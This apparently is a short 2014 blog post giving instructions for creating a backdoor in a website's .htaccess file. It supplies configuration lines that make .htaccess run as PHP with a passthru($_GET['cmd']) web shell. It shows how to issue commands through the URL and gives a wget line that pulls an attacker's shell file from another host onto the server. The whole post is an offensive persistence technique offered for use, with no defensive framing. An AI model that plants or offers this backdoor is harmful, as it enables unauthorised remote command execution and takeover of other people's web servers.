Create Backdoor in .htaccess



We Creating  Backdoor in .htaccess(Hypertext access)

1: Go public_html in shell and need to edit the .htaccess.

                                                             PHP Codes
-------------------------------------------------------
<?php
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-php .htaccess

# <?php passthru($_GET['cmd']); ?>
-------------------------------------------------------
And need to type CMD Commands like this

yoursite.com/.htaccess?cmd=

For Shell Upolad

yoursite.com/.htaccess?cmd=wget -O xyz.php http://yourothersitewithshell/yourshell.txt


Now you can access your shell..


Share This Post »»

Penulis : Admin ~ Sebuah blog yang menyediakan berbagai macam informasi

Artikel Create Backdoor in .htaccess ini dipublish oleh Admin pada hari Sunday 1 June 2014 . Semoga artikel ini dapat bermanfaat.Terimakasih atas kunjungan Anda silahkan tinggalkan komentar.sudah ada 0 komentar: di postingan Create Backdoor in .htaccess
 

0 comments :

Post a Comment